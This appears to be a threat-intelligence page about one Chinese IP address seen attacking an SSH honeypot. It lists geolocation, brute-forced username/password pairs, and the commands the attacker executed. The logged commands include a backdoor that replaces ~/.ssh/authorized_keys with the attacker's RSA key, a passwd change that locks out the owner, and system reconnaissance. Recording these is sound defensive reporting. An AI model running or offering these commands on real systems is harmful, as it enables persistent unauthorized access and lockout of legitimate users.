Active Threat โ€ข HIGH

118.122.147.195

First Detection1/15/2026
Last Activity2/18/2026
ISPCHINANET SiChuan Telecom Internet Data Center
๐ŸŽฏ
206
Total Attacks
๐Ÿ”Œ
1
Ports
๐Ÿ“ก
1
Attack Types
๐Ÿฆ 
17
Malware

Geolocation

Country
๐Ÿ‡จ๐Ÿ‡ณ China
City
Unknown
ASN
AS38283
ISP
CHINANET SiChuan Telecom Internet Data Center

Attack Types

cowrie

Attacked Ports

22

Associated Malware

Attempted Credentials

๐Ÿ”root/1029384756
1x
๐Ÿ”frappe/password
1x
๐Ÿ”user_1/user_1
1x
๐Ÿ”dev/1q2w3e4r5t
1x
๐Ÿ”ha/ha
1x
๐Ÿ”root/a12345678.
1x
๐Ÿ”vladimir/12345678
1x
๐Ÿ”root/1qazxc
1x
๐Ÿ”wahyu/wahyu123
1x
๐Ÿ”student/student
1x
๐Ÿ”admin/Master123
1x

Executed Commands

$ls -lh $(which ls)1x
$w1x
$whoami1x
$cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~1x
$free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'1x
$echo "1q2w3e4r5t\nG18gYthS3rCX\nG18gYthS3rCX\n"|passwd1x
$uname -a1x
$crontab -l1x
$cat /proc/cpuinfo | grep model | grep name | wc -l1x
$Enter new UNIX password:1x

Risk Assessment

65
/100
LowMediumHighCritical